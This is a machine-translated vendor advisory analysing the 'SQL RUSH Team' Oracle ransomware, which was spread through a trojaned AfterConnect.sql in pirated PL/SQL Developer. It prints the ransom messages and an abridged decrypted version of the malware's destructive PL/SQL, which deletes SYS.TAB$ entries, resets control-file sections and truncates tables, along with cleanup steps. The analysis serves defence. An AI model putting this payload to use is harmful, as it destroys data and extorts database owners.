Know Yourself and Know Your Enemy - Demystifying and Preventing Oracle Security Bitcoin Ransomware Issues

Abstract: Risk is never just imagination and grass and trees. Just when you are inadvertent, risks may suddenly come to us. Recently, the Oracle database of many users in China suddenly encountered an inexplicable attack incident. Everyone guessed, figured out, and tried again, causing a small data panic.
Risk has never been imaginary and weeds. Just when you are inadvertent, risks may suddenly come to us.
Recently, the Oracle database of many users in China suddenly encountered an inexplicable attack incident. Everyone guessed, figured out, and tried again, causing a small data panic.
After noticing such security incidents, we immediately devoted ourselves to analysis and collection, and finally found out the root cause of the problem. Yesterday, a comprehensive early warning and warning were issued. Today, we will discuss this kind of problem in detail again, and share with Oracle users. for alertness.
The main cause of the recent issues is that some users downloaded database management tools from unknown sources, which resulted in database infections. We strongly recommend everyone to increase their awareness of copyright, buy genuine software, stay away from risks, and start from the norm.
Symptoms of the problem:
Many users found this problem when recording the database, and the database application popped up a "locked" prompt, and threatened to send 5 bitcoins to the hacker to unlock it.
On the client side, you may get a similar message:
after the database is attacked, the alarm log of the database may be filled with the following information:
ORA-00604: error occurred at recursive SQL level 1
ORA-20315: your database has been SQL RUSH Team lock and send 5 bitcoins to this address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case matching) and then mail your Oracle SID to [email protected] and we will let you know how to unlock your database 
Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address [email protected], we will let you know how to unlock your database.
ORA -06512: at "XXX.DBMS_CORE_INTERNAL ", line 27
ORA-06512: at line 2
This is nothing more than some warnings and extortion, but here is the SQL RUSH Team, which aroused everyone's speculation, sqlrush @ mail.com, this address and id caused Of course, the facts are unknown.
Cause of the problem:
We analyzed the cause of the problem and the infection process in detail through limited cases, and disclosed it here for reference to Oracle users.
Note: When a problem is clearly researched, there will no longer be fear. Fear comes from the unknown. Before the cause is not encountered, everyone's various guesses lead to the expansion of the problem. Now we can return to the essence of the problem.
The root cause of the problem is: if a user downloads a pirated PL/SQL Developer tool from the Internet (especially various green and cracked versions), it may be tricked by this tool. So this problem has little to do with Oracle itself, and it is not as complicated as injection. But as you use this tool, the user's permissions are naturally invaded by the possessed.
The important question must be said three times: pirated software harms people!
There is no doubt about the popularity and piracy of PL/SQL Developer in China. There is a script file AfterConnect.sql in the installation directory of this software, and this script is the real problem.
Genuine software installation, this script file is an empty file, but the injected file contains a series of JOB definitions, stored procedures and trigger definitions, which is the source of the disaster.
Infected file - AfterConnect.sql starts like this, disguised as a login.sql script content, with clear comment code:
640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=
Substantial content, displayed in encrypted form, users can't see it Content, but can be decrypted by unwrap (but pay attention to those decryption programs without malicious code):
640?wx_fmt=png&tp=webp&wxfrom=5&wx_lazy=
No doubt, the hacker is very familiar with the Oracle database. The core part of the script code is as follows after decryption (Abridged, no harm done):
BEGIN
   SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
   EXECUTE IMMEDIATE 'create table ORACHK'||SUBSTR(SYS_GUID ,10)||' tablespace system as select * from sys.tab$';
   DELETE SYS.TAB$ WHERE DATAOBJ# IN (SELECT DATAOBJ# FROM SYS.OBJ$ WHERE OWNER# NOT IN (0,38)) ;
   COMMIT;
   EXECUTE IMMEDIATE 'alter system checkpoint';
   SYS.DBMS_BACKUP_RESTORE.RESETCFILESECTION(14);
   FOR I IN 1..2046 LOOP
   DBMS_SYSTEM.KSDWRT(2, 'Hi buddy, your database was hacked by SQL RUSH Team, send 5 bitcoin to address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case sensitive), after that send your Oracle SID to mail address sqlrush@mail. com, we will let you know how to unlock your database.');
   DBMS_SYSTEM.KSDWRT(2, 'Your database has been locked by SQL RUSH Team, send 5 bitcoins to this address 166xk1FXMB2g8JxBVF5T4Aw1Z5aZ6vSE (case consistent) Oracle SID mailing address [email protected] and we will let you know how to unlock your database');
   END LOOP;
   END IF;
END; 
Please pay attention to the professionalism of hackers. At the beginning of the program, there are the following judgments:
SELECT NVL(TO_CHAR(SYSDATE-CREATED ),0) INTO DATE1 FROM V$DATABASE;
   IF (DATE1>=1200) THEN
That is, to judge the database creation time More than 1200 days before starting action (this judgment is quite insightful, small library and new library, less data is not important, put a long line to catch big fish first), if your database has not exploded, it may be because the time has not come.
We strongly recommend users to check the usage of database tools and avoid using tools products of unknown origin.
We strongly recommend: Use genuine software to avoid unknown risks.
Security vulnerability:
We know that almost most of the database client tools can define certain functions through scripts when accessing the database, and these scripts are often one of the security vulnerabilities. The attack method in this example is very rudimentary, but it is also very ingenious.
It is a taboo to download tools with unknown sources, unknown sources of localization, and unknown sources of cracking. The following lists the script locations of common client tools, which need attention:
SQL*Plus: glogin.sql / login.sql
TOAD : toad. ini
PLSQLdeveloper: login.sql / afterconnect.sql
We strongly recommend users to strengthen database permission control, isolation of production environment and test environment, and strict control of development and operation and maintenance tools.
Disposal suggestion:
This attack uses JOB, triggers, and stored procedures to coordinate tools, so if the database encounters this problem, you can set the JOB parameter job_queue_processes to 0, block the execution of the JOB, and then restart the database. Injected objects can be cleaned up, these objects may include the following triggers and stored procedures of the same name:
PROCEDURE "DBMS_CORE_INTERNAL "
PROCEDURE "DBMS_SYSTEM_INTERNAL "
PROCEDURE "DBMS_SUPPORT_INTERNAL "
And the core code of the attack also includes, which truncates the data table:
STAT:='truncate table ' ||USER||'.'||I.TABLE_NAME;
If your database has been attacked and data is lost, you can urgently contact the service team of Cloud and Enmo, and we can help you deal with data restoration. Cloud and Enmo's proven ODU products can maximize data recovery after data loss. Cloud and Enmo's automated inspection tool: Bethune, with a built-in inspection, access source, access tool analysis, can help users sort out your database usage. Don't hesitate to check it out at https://bethune.enmotech.com, no charge.
Event review:
In September 2015, the incident of XcodeGhost's invasion of Apple's iOS caused a lot of shock in the industry. The incident was caused by unknown hackers implanting malicious programs into Xcode, the iOS application development tool, and spreading them through online disks and forums. The infected apps hijacked Apple user-related information. Data from multiple security teams shows that the virus infection has affected 76 of the 5,000 most downloaded apps in the AppStore, and it is conservatively estimated that the number of affected users exceeds 100 million.
In February 2012, the Chinese version of putty and other SSH remote management tools were exposed to have a backdoor, which would automatically steal the SSH username and password entered by the administrator and send them to the designated server.